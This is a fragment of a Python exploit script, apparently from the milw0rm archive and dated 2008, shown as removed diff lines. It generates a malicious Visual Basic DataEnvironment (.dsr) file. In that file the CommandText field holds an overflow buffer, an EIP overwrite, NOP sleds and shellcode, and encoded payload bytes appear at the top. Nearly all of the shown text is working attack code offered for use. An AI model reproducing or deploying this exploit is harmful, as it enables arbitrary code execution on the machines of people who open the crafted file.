- "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56" - "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" - ) - -dsrfile = ( - "VERSION 5.00\n" - "Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n" - " ClientHeight = 6315\n" - " ClientLeft = 0\n" - " ClientTop = 0\n" - " ClientWidth = 7980\n" - " _ExtentX = 14076\n" - " _ExtentY = 11139\n" - " FolderFlags = 1\n" - ' TypeLibGuid = "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n' - ' TypeInfoGuid = "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n' - " TypeInfoCookie = 0\n" - " Version = 4\n" - " NumConnections = 1\n" - " BeginProperty Connection1\n" - ' ConnectionName = "Connection1"\n' - " ConnDispId = 1001\n" - " SourceOfData = 3\n" - ' ConnectionSource= ""\n' - " Expanded = -1 'True\n" - " QuoteChar = 96\n" - " SeparatorChar = 46\n" - " EndProperty\n" - " NumRecordsets = 1\n" - " BeginProperty Recordset1\n" - ' CommandName = "Command1"\n' - " CommDispId = 1002\n" - " RsDispId = 1003\n" - ' CommandText = "' + buff + get_EIP + nop + shellcode + nop + '"\n' - ' ActiveConnectionName= "Connection1"\n' - " CommandType = 2\n" - " dbObjectType = 1\n" - " Locktype = 3\n" - " IsRSReturning = -1 'True\n" - " NumFields = 1\n" - " BeginProperty Field1\n" - " Precision = 10\n" - " Size = 4\n" - " Scale = 0\n" - " Type = 3\n" - ' Name = "ID"\n' - ' Caption = "ID"\n' - " EndProperty\n" - " NumGroups = 0\n" - " ParamCount = 0\n" - " RelationCount = 0\n" - " AggregateCount = 0\n" - " EndProperty\n" - "End\n" - 'Attribute VB_Name = "DataEnvironment1"\n' - "Attribute VB_GlobalNameSpace = False\n" - "Attribute VB_Creatable = True\n" - "Attribute VB_PredeclaredId = True\n" - "Attribute VB_Exposed = False\n" - ) - -try: - out_file = open("DataEnvironment1.dsr",'w') - out_file.write(dsrfile) - out_file.close() - print "\nFILE CREATION COMPLETED!\n" -except: - print " \n -------------------------------------" - print " Usage: exploit.py" - print " -------------------------------------" - print "\nAN ERROR 
OCCURS DURING FILE CREATION!" - -# milw0rm.com [2008-04-04]